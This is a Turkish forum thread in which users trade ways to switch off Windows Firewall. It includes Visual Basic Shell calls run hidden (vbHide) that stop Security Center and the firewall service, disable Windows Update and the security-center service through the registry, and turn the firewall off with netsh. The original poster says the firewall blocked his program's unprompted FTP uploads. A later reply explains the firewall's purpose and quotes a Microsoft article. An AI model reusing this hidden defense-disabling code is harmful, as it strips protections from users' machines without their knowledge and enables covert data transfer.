Windows Güvenlik Duvarını Kapatmak

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    DE5TROY3R
    DE5TROY3R's avatar
    Erkek

Shell "cmd.exe /c net stop " & Chr(34) & "Security Center" & Chr(34), vbHide
    Shell "cmd.exe /c net stop SharedAccess", vbHide
    Shell "reg add " & Chr(34) & "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" & Chr(34) & " /v Start /t REG_DWORD /d 0x4 /f", vbHide
    Shell "cmd.exe /c reg add " & Chr(34) & "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" & Chr(34) & " /v Start /t REG_DWORD /d 0x4 /f", vbHide
    Shell "cmd.exe /c reg add " & Chr(34) & "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" & Chr(34) & " /v Start /t REG_DWORD /d 0x4 /f", vbHide

XP de 5 satırlık kod ile kapatılıyor. Windows 7 de nasıl kapatabiliriz ?

2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    renegadealien
    renegadealien's avatar
    Üstün Hizmet Madalyası Savaş Madalyası Başarı Madalyası Üstün Hizmet Madalyası Developer Madalyası
    Erkek

niye sağ tuşla kapatmıyosun hocam?

netsh advfirewall firewall komutunun sonuna bişlier eklenince kapanıyor hocam, aslında tam kapanma değil profilleri disable ediyosun bitiyo...

daha 3 gün önce bi gavur sitesinde gözüme çarptı

tamamen kapatmak için net stop ile servisinide durdurabilirsin...

Sanıyorum kendi atasözümü yaptım, kaynak belirterek kullanabilirsiniz. 10.05.2013 tarihli google arama sonucu : Aradığınız - "herşeyin hayırlısı rampanın bayırlısı" - ile ilgili hiçbir arama sonucu mevcut değil. Not : Söyleyeni belli olduğu için(Ben) atasözü değil, özlüsöz oluyormuş, dolayısı ile kendi özlüsözümü yapmış oldum :)
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Cosmic
    Cosmic's avatar
    Erkek

şöyle bişey buldum                     netsh firewall set opmode disable

Bittik biz bittik
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    renegadealien
    renegadealien's avatar
    Üstün Hizmet Madalyası Savaş Madalyası Başarı Madalyası Üstün Hizmet Madalyası Developer Madalyası
    Erkek

aha bu ama advfirewall firewall olarak kullanılması tercih edilir..

Bill amca diyorki advfirewal firewall komutunu yeni nesil için cıkardık

her ne kadar onunla yapabildiğiniz bazı işlemleri firewall komutuyla yapabiliyor olsanızda, ötekini tercih edin...

kaynak microsoft knowledge base deki bilmem kac numaralı dosya...

Sanıyorum kendi atasözümü yaptım, kaynak belirterek kullanabilirsiniz. 10.05.2013 tarihli google arama sonucu : Aradığınız - "herşeyin hayırlısı rampanın bayırlısı" - ile ilgili hiçbir arama sonucu mevcut değil. Not : Söyleyeni belli olduğu için(Ben) atasözü değil, özlüsöz oluyormuş, dolayısı ile kendi özlüsözümü yapmış oldum :)
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    renegadealien
    renegadealien's avatar
    Erkek

atta burdaymış :

The netsh advfirewall firewall command-line context is available in Windows Server 2008 and in Windows Vista. This context provides the functionality for controlling Windows Firewall behavior that was provided by the netsh firewall context in earlier Windows operating systems.

This context also provides functionality for more precise control of firewall rules. These rules include the following per-profile settings:

• Domain
    • Private
    • Public

The netsh firewall command-line context might be deprecated in a future version of the Windows operating system. We recommend that you use the netsh advfirewall firewall context to control firewall behavior.

Note The netsh firewall command line is not recommended for use in Windows Vista.

This article describes how to use the netsh advfirewall firewall context instead of the netsh firewall context to control Windows Firewall behavior in Windows Server 2008 and in Windows Vista.

http://support.microsoft.com/kb/947709

Yeni komutta netsh advfirewall set currentprofile state off

6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    DE5TROY3R
    DE5TROY3R's avatar
    Erkek

renegadealien bunu yazdı:
    -----------------------------

niye sağ tuşla kapatmıyosun hocam?

netsh advfirewall firewall komutunun sonuna bişlier eklenince kapanıyor hocam, aslında tam kapanma değil profilleri disable ediyosun bitiyo...

daha 3 gün önce bi gavur sitesinde gözüme çarptı

tamamen kapatmak için net stop ile servisinide durdurabilirsin...

cosmic bunu yazdı:

şöyle bişey buldum                     netsh firewall set opmode disable

renegadealien bunu yazdı:

aha bu ama advfirewall firewall olarak kullanılması tercih edilir..

Bill amca diyorki advfirewal firewall komutunu yeni nesil için cıkardık

her ne kadar onunla yapabildiğiniz bazı işlemleri firewall komutuyla yapabiliyor olsanızda, ötekini tercih edin...

kaynak microsoft knowledge base deki bilmem kac numaralı dosya...

FTP ye veri gönderirken bu şey onay istiyordu o yüzden

Bill rulz :D işimi gördü

Shell "netsh advfirewall set currentprofile state off", 0

diye kullanırız bizde ozaman:D

Edit: Windows güvenlik duvarı ne işe yarıyor bu kadar kolay kapatılabiliyor

7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Master
    Master's avatar
    Erkek

Windows Güvenlik duvarındaki mantık Internet ortamında gelecek olan tehlikeleri koruyan Network Güvenlik duvarlarıyla aynı değil.. O yüzden pek çok kullanıcı Windows güvenlik duvarının ne işe yaradığını bilmiyor ya da anlayamıyor..

Bunu anlamak için Server işletim sistemleri kullanmanız ve Clientler üzerinde işlemler yapmanız gerekir. O zaman ne büyük bi Nimet olduğunu anlarsınız :)

Ayrıca RENE'nin bahsettiği Netsh konsolunu daha önce Forumda paylaşmiştim Resimli olarak şuradan bakabilirsiniz :

http://www.tahribat.com/Forum-Netsh-Konsolu-Ile-Firewall-Yapilandirmasi-Resimli-Anlatim-110156/

Bilgi güçtür, düşmanını barışa zorlar.
Toplam Hit: 3205 Toplam Mesaj: 7